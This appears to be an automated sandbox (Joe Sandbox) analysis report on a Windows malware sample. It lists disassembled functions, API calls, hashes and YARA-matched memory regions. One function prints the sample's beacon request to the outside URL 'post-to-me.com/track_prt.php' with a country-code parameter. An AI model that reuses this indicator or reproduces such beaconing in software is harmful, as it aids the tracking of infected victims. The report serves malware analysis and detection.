                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0067A0C4
                                                                                                      • Part of subcall function 006736D1: HeapFree.KERNEL32(00000000,00000000,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?), ref: 006736E7
                                                                                                      • Part of subcall function 006736D1: GetLastError.KERNEL32(?,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?,?), ref: 006736F9
                                                                                                    • _free.LIBCMT ref: 0067A0D6
                                                                                                    • _free.LIBCMT ref: 0067A0E8
                                                                                                    • _free.LIBCMT ref: 0067A0FA
                                                                                                    • _free.LIBCMT ref: 0067A10C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction ID: 9d50bf2de982c0f737dee9e3895c03f4f0f99281dd8a6022ed9d54d01cb936ad
                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction Fuzzy Hash: 96F06272515210BB8AA0EBA4E8C3C5A73DBAA40350B748D59F00CD7B12CB71FCA0966E
                                                                                                    APIs
                                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                    • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2583373041-0
                                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                    APIs
                                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0065CF36
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0065CF67
                                                                                                    • GetCurrentThread.KERNEL32 ref: 0065CF70
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0065CF83
                                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0065CF8C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2583373041-0
                                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction ID: 088e5fd4204b7bf23deca84ba0de98219de680e4579ecad16399aa7c8969956d
                                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction Fuzzy Hash: CCF0A032200610EFC765EF20EA518BAB3B7AFC4722750450CFD8B06691CF21A94ED775
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00642E8E
                                                                                                      • Part of subcall function 00641321: _wcslen.LIBCMT ref: 00641328
                                                                                                      • Part of subcall function 00641321: _wcslen.LIBCMT ref: 00641344
                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 006430A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InternetOpen_wcslen
                                                                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                    • API String ID: 3381584094-4083784958
                                                                                                    • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                    • Instruction ID: c5d618ba1c2c27a40b889b7ac878687c246d4c5b95c0083ffcf88404b5f96e93
                                                                                                    • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                    • Instruction Fuzzy Hash: B45173A5A55344A8E320EFB0BC56B723378FF58712F10543AE518CB2B2E7B1D944875E
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006746DB
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006746F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: ]Eg$]Eg
                                                                                                    • API String ID: 885266447-3188043194
                                                                                                    • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                    • Instruction ID: 74e5fe8bb84e26b2ad57fa935f840e161272a38c8978a757dffcc3641d27dbfe
                                                                                                    • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                    • Instruction Fuzzy Hash: 42515A71A00249AFCF18DF58C888AADBBB3EF86314F19C259E81897362DB31DD51CB40
                                                                                                    APIs
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0066896A
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00668A23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: fB$csm
                                                                                                    • API String ID: 3480331319-1586063737
                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction ID: e81216690c08a2cf7668dee7c4bcf8d6486ae729f5ce669c9a047c5a56ccdc96
                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction Fuzzy Hash: 2241D634A002489FCF10DF78C845AAE7BB6AF44328F14826AED156B392DB329905CF95
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IH5XqCdf06.exe,00000104), ref: 0042F753
                                                                                                    • _free.LIBCMT ref: 0042F81E
                                                                                                    • _free.LIBCMT ref: 0042F828
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                    • API String ID: 2506810119-1372856917
                                                                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                    • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                    • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IH5XqCdf06.exe,00000104), ref: 0066F9BA
                                                                                                    • _free.LIBCMT ref: 0066FA85
                                                                                                    • _free.LIBCMT ref: 0066FA8F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                    • API String ID: 2506810119-1372856917
                                                                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                    • Instruction ID: d51cb6d2b02ec33ed9b8f472eeef3fb93b19cb93892fbc163a72057f7e913e30
                                                                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                    • Instruction Fuzzy Hash: 26316F71A00258EFDB21DF99EC8599EBBFDEF99710B20407AE80897311D6709E41CB94
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 0043922A: _free.LIBCMT ref: 00439290
                                                                                                      • Part of subcall function 00438E9F: GetOEMCP.KERNEL32(00000000), ref: 00438ECA
                                                                                                    • _free.LIBCMT ref: 00439183
                                                                                                    • _free.LIBCMT ref: 004391B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast
                                                                                                    • String ID: 0Qn$0Qn
                                                                                                    • API String ID: 3291180501-3595474401
                                                                                                    • Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                                                    • Instruction ID: 97d82b3a2133808e380870247b9945ea31129e8917de2cc4f3b867beb4678205
                                                                                                    • Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                                                    • Instruction Fuzzy Hash: 63312731904205AFEF10EF99D444A5EB7F1EF48324F14119FE80467391DB799E40CB48
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                      • Part of subcall function 00679491: _free.LIBCMT ref: 006794F7
                                                                                                      • Part of subcall function 00679106: GetOEMCP.KERNEL32(00000000), ref: 00679131
                                                                                                    • _free.LIBCMT ref: 006793EA
                                                                                                    • _free.LIBCMT ref: 00679420
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast
                                                                                                    • String ID: 0Qn$0Qn
                                                                                                    • API String ID: 3291180501-3595474401
                                                                                                    • Opcode ID: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
                                                                                                    • Instruction ID: 6fcf784fe21b74b763d32ad2708e3c5bacf202207c85a9741693537532ff731c
                                                                                                    • Opcode Fuzzy Hash: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
                                                                                                    • Instruction Fuzzy Hash: 4831C431904204AFDB10DB69D481BAD77F6EF40374F25819EE9089B391EB729D41CB64
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0040DDAB,?,004334EB,0040DDAB,00457AF8,0000000C), ref: 00433623
                                                                                                    • GetLastError.KERNEL32(?,004334EB,0040DDAB,00457AF8,0000000C), ref: 0043362D
                                                                                                    • __dosmaperr.LIBCMT ref: 00433658
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID: (En
                                                                                                    • API String ID: 2583163307-3994761557
                                                                                                    • Opcode ID: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                    • Instruction ID: ffcc1f2f27edde42b46ba62bf7cfabe2240423d0af948ad6885287928014fc29
                                                                                                    • Opcode Fuzzy Hash: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                    • Instruction Fuzzy Hash: 17016F326042103AD6342B75684677F67458F8EB39F25212FF515873D2DA6DCE82414D
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0064E012,?,00673752,0064E012,00457AF8,0000000C), ref: 0067388A
                                                                                                    • GetLastError.KERNEL32(?,00673752,0064E012,00457AF8,0000000C), ref: 00673894
                                                                                                    • __dosmaperr.LIBCMT ref: 006738BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID: (En
                                                                                                    • API String ID: 2583163307-3994761557
                                                                                                    • Opcode ID: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                    • Instruction ID: 5d421d236a30c9f0f88937ef9d05be21bb35a765f0eb549a8e015b69e79adf1f
                                                                                                    • Opcode Fuzzy Hash: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                    • Instruction Fuzzy Hash: 70012B3261023016D22827386845BFE679B4FD2F35F25836DF81D8B3C2DA74CE826196
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                    • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                    • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                    • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                    • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                    • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                    • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                    • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                    • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pScheduler
                                                                                                    • API String ID: 1381464787-923244539
                                                                                                    • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                    • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                    • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                    • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                    APIs
                                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pContext
                                                                                                    • API String ID: 1990795212-2046700901
                                                                                                    • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                    • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                    • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                    • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                    • _free.LIBCMT ref: 0042E069
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFreeHandleLibrary_free
                                                                                                    • String ID: B
                                                                                                    • API String ID: 621396759-3071617958
                                                                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                    • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                    • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                    APIs
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pScheduler$version
                                                                                                    • API String ID: 1687795959-3154422776
                                                                                                    • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                    • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                    • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                    • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                    • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                    • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                    • Instruction ID: 2306344a56f5892e58eca73b8a2d9440201fd30319a7745a1c716452a40b1a09
                                                                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                    • Instruction Fuzzy Hash: 9BA15871900B869FD722CF58C8957AEBBE7EF11310F2481EED48A9B381C6B49942CB54
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                    • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                    • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                    • Instruction ID: bf3fd9831dbed06ad7fb511b833f51b0785eb5ce98a9f8415c37c00447cecacd
                                                                                                    • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                    • Instruction Fuzzy Hash: 4F412B31A00110ABDB756FB88C46EEE36A7EF42770F24C639F82CD6291EB354D4186A5
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0067047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00676B51
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00676BDA
